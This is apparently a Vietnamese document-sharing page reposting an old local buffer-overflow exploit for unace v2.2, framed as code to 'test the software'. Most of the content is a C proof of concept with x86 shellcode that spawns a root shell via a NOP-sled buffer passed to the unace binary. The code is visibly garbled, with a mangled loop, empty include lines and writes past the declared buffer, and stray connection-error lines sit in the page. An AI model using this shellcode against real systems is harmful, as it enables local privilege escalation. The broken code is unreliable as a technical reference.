Unace Exploitable Buffer Overflow

Chia sẻ: Ai Dieu | Ngày: | Loại File: DOC | Số trang:3

Thêm vào BST

Báo xấu

73
lượt xem 6
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

An exploitable buffer overflow in unace has been found, the vulnereability will allow local attackers to cause the product to execute abitrary code. The following exploit code can be used to test the software for the vulnerability.

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Unace Exploitable Buffer Overflow

Unace Exploitable Buffer Overflow trang này đã được đọc lần An exploitable buffer overflow in unace has been found, the vulnereability will allow local attackers to cause the product to execute abitrary code. The following exploit code can be used to test the software for the vulnerability. CODE /* gEEkunace.c * * PoC exploit made for advisory based uppon an local stack based overflow. * Vulnerable versions, maybe also prior versions: * * * Tested on: Debian 3.0 * * Advisory source: MegaHz * * * coded by: demz (geekz.nl) (demz@geekz.nl) * * */
#include #include char shellcode[]= "\x31\xc0" // xor eax, eax "\x31\xdb" // xor ebx, ebx "\x31\xc9" // xor ecx, ecx "\xb0\x46" // mov al, 70 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\x50" // push eax "\x68\x6e\x2f\x73\x68" // push long 0x68732f6e "\x68\x2f\x2f\x62\x69" // push long 0x69622f2f "\x89\xe3" // mov ebx, esp "\x50" // push eax "\x53" // push ebx "\x89\xe1" // mov ecx, esp "\x99" // cdq "\xb0\x0b" // mov al, 11 "\xcd\x80" // int 0x80 "\x31\xc0" // xor eax, eax "\xb0\x01" // mov al, 1 "\xcd\x80"; // int 0x80
int main() { unsigned long ret = 0xbfffc260; char buffer[707]; int i=0; memset(buffer, 0x90, sizeof(buffer)); for (0; i > 8; buffer[709] = (ret & 0x00ff0000) >> 16; buffer[710] = (ret & 0xff000000) >> 24; buffer[711] = 0x0; printf("\nUnace v2.2 local exploit\n"); printf(" demz @ geekz.nl \n"); execl("./unace", "unace", "e", buffer, NULL); }

CÓ THỂ BẠN MUỐN DOWNLOAD

ERROR:connection to 10.20.1.100:9315 failed (errno=111, msg=Connection refused)
ERROR:connection to 10.20.1.100:9315 failed (errno=111, msg=Connection refused)

THÔNG TIN

TRỢ GIÚP

HỖ TRỢ KHÁCH HÀNG

Theo dõi chúng tôi

Chịu trách nhiệm nội dung:

Nguyễn Công Hà - Giám đốc Công ty TNHH TÀI LIỆU TRỰC TUYẾN VI NA

LIÊN HỆ

Địa chỉ: P402, 54A Nơ Trang Long, Phường 14, Q.Bình Thạnh, TP.HCM

Hotline: 093 303 0098

Email: support@tailieu.vn